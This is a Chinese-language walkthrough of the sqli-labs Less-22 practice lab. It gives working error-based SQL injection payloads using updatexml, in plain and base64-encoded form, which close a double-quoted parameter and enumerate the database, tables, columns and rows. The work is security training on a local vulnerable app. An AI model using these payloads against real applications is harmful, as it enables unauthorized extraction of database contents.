前言
本题跟上题做法相似,只是符号的区别
前期准备
开启phpstudy,开启apache服务以及mysql服务
实验环节
浏览器访问Less-22
http://192.168.199.135/sqli-labs-master/Less-22/
进行简单闭合,页面正常显示
Dumb" -- xz
base64编码后:RHVtYiIgLS0geHo=
判断库名
Dumb" and updatexml(1, concat(0x7e, database(), 0x7e), 1)-- xz
base64编码后:RHVtYiIgYW5kIHVwZGF0ZXhtbCgxLCBjb25jYXQoMHg3ZSwgZGF0YWJhc2UoKSwgMHg3ZSksIDEpLS0geHo=
判断表名
Dumb"and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='security'limit 0,1),0x7e),1)-- xz
base64编码后:RHVtYiJhbmQgdXBkYXRleG1sKDEsY29uY2F0KDB4N2UsKHNlbGVjdCB0YWJsZV9uYW1lIGZyb20gaW5mb3JtYXRpb25fc2NoZW1hLnRhYmxlcyB3aGVyZSB0YWJsZV9zY2hlbWE9J3NlY3VyaXR5J2xpbWl0IDAsMSksMHg3ZSksMSktLSB4eg==
判断列名
Dumb"and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_schema='security' and table_name='emails' limit 0,1),0x7e),1) -- xz
base64编码后:RHVtYiJhbmQgdXBkYXRleG1sKDEsY29uY2F0KDB4N2UsKHNlbGVjdCBjb2x1bW5fbmFtZSBmcm9tIGluZm9ybWF0aW9uX3NjaGVtYS5jb2x1bW5zIHdoZXJlIHRhYmxlX3NjaGVtYT0nc2VjdXJpdHknIGFuZCB0YWJsZV9uYW1lPSdlbWFpbHMnIGxpbWl0IDAsMSksMHg3ZSksMSkgLS0geHo=
判断数据
Dumb"and updatexml(1,concat(0x7e,(select id from emails limit 0,1),0x7e),1)-- xz
base64编码后:RHVtYiJhbmQgdXBkYXRleG1sKDEsY29uY2F0KDB4N2UsKHNlbGVjdCBpZCBmcm9tIGVtYWlscyBsaW1pdCAwLDEpLDB4N2UpLDEpLS0geHo=
评论区